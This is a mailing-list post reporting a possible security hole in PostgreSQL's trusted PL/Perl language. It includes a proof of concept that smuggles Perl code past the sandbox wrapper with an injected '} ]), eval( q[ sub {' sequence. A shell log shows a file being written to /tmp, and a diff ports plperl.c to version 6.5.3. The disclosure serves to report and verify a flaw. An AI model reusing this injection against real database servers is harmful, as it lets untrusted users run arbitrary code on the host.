possible security problem with PL/perl

I was looking the extension PL/Tcl and PL/perl for trying to write an
extension for another language, when I've found a possible problem with
PL/perl.

My configuration :
* PostgreSQL 6.5.3
* plperl extract from postgresql-7.0beta1.tar.gz
* perl 5.005_03

At the end of this message, my modification to compile it under 6.5.3 if
somebody want to verify it (modification of some constants only :
FUNC_MAX_ARGS, PROCOID and TYPEOID)

The file README say :

------------------------------------------------------------
-- here is one that will fail. Creating the function
-- will work, but using it will fail.
CREATE FUNCTION badfunc() RETURNS int4 AS '
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';

SELECT badfunc();
------------------------------------------------------------

Here my example :

------------------------------------------------------------
aestivum% pwd
/var/postgres/pl/plperl
aestivum% ls -alg /tmp/badfile
ls: /tmp/badfile: No such file or directory
aestivum% cat README

CREATE FUNCTION plperl_call_handler() RETURNS opaque
AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C';

CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
HANDLER plperl_call_handler
LANCOMPILER 'PL/Perl';

CREATE FUNCTION badfunc() RETURNS int4 AS '
} ]), eval( q[ sub {
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';

SELECT badfunc();

aestivum% psql toto < README

CREATE FUNCTION plperl_call_handler() RETURNS opaque
AS '/var/postgres/pl/plperl/plperl.so' LANGUAGE 'C';
CREATE

CREATE TRUSTED PROCEDURAL LANGUAGE 'plperl'
HANDLER plperl_call_handler
LANCOMPILER 'PL/Perl';
CREATE

CREATE FUNCTION badfunc() RETURNS int4 AS '
} ]), eval( q[ sub {
open(TEMP, ">/tmp/badfile");
print TEMP "Gotcha!\n";
return 1;
' LANGUAGE 'plperl';
CREATE

SELECT badfunc();
badfunc
-------
1
(1 row)

EOF
aestivum% ls -alg /tmp/badfile
-rw------- 1 postgres postgres 8 Mar 6 07:31 /tmp/badfile
aestivum%
aestivum% cat /tmp/badfile
Gotcha!
aestivum%

------------------------------------------------------------

There is no failure and the file is created.

Someone can verify if this problem :
1) is real
2) still exist in postgres 7.0beta1

Thanks,

Guy Decoux

ps: I'm not subscribed to this mailing list

------------------------------------------------------------
aestivum% diff -u plperl.c~ plperl.c
--- plperl.c~ Sun Feb 20 09:00:27 2000
+++ plperl.c Mon Mar 6 07:14:39 2000
@@ -86,10 +86,10 @@
Oid result_in_elem;
int result_in_len;
int nargs;
- FmgrInfo arg_out_func[FUNC_MAX_ARGS];
- Oid arg_out_elem[FUNC_MAX_ARGS];
- int arg_out_len[FUNC_MAX_ARGS];
- int arg_is_rel[FUNC_MAX_ARGS];
+ FmgrInfo arg_out_func[MAXFMGRARGS];
+ Oid arg_out_elem[MAXFMGRARGS];
+ int arg_out_len[MAXFMGRARGS];
+ int arg_is_rel[MAXFMGRARGS];
SV* reference;
} plperl_proc_desc;

@@ -490,7 +490,7 @@
/************************************************************
* Lookup the pg_proc tuple by Oid
************************************************************/
- procTup = SearchSysCacheTuple(PROCOID,
+ procTup = SearchSysCacheTuple(PROOID,
Object
IdGetDatum(proinfo->fn_oid),
0, 0,
0);
if (!HeapTupleIsValid(procTup))
@@ -505,7 +505,7 @@
* Get the required information for input conversion of the
* return value.
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum
(procStruct->prorettype),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -535,7 +535,7 @@
proc_internal_args[0] = '\0';
for (i = 0; i < proinfo->fn_nargs; i++)
{
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(procStr
uct->proargtypes[i]),

0, 0, 0);
if (!HeapTupleIsValid(typeTup))
@@ -720,7 +720,7 @@
/************************************************************
* Lookup the pg_proc tuple by Oid
************************************************************/
- procTup = SearchSysCacheTuple(PROCOID,
+ procTup = SearchSysCacheTuple(PROOID,
Object
IdGetDatum(proinfo->fn_oid),
0, 0,
0);
if (!HeapTupleIsValid(procTup))
@@ -1041,7 +1041,7 @@
* Lookup the attribute type in the syscache
* for the input function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->attrs[attnum - 1]->a
tttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -2058,7 +2058,7 @@
* Lookup the attribute type in the syscache
* for the output function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->att
rs[i]->atttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
@@ -2134,7 +2134,7 @@
* Lookup the attribute type in the syscache
* for the output function
************************************************************/
- typeTup = SearchSysCacheTuple(TYPEOID,
+ typeTup = SearchSysCacheTuple(TYPOID,
ObjectIdGetDatum(tupdesc->att
rs[i]->atttypid),
0, 0,
0);
if (!HeapTupleIsValid(typeTup))
aestivum%

------------------------------------------------------------